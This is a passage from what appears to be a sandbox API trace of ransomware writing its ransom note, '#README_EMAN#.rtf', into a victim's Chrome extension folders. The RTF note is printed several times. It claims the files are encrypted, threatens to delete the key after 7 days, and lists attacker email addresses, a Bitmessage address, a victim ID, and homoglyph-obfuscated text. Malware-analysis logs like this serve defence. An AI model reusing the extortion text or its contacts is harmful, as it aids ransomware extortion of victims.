m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0272.525] WriteFile (in: hFile=0x2c8, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0272.526] CloseHandle (hObject=0x2c8) returned 1 [0272.526] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_br\\#readme_eman#.rtf")) returned 0xffffffff [0272.526] GetLastError () returned 0x2 [0272.526] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_br\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0272.526] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0272.526] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0272.526] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 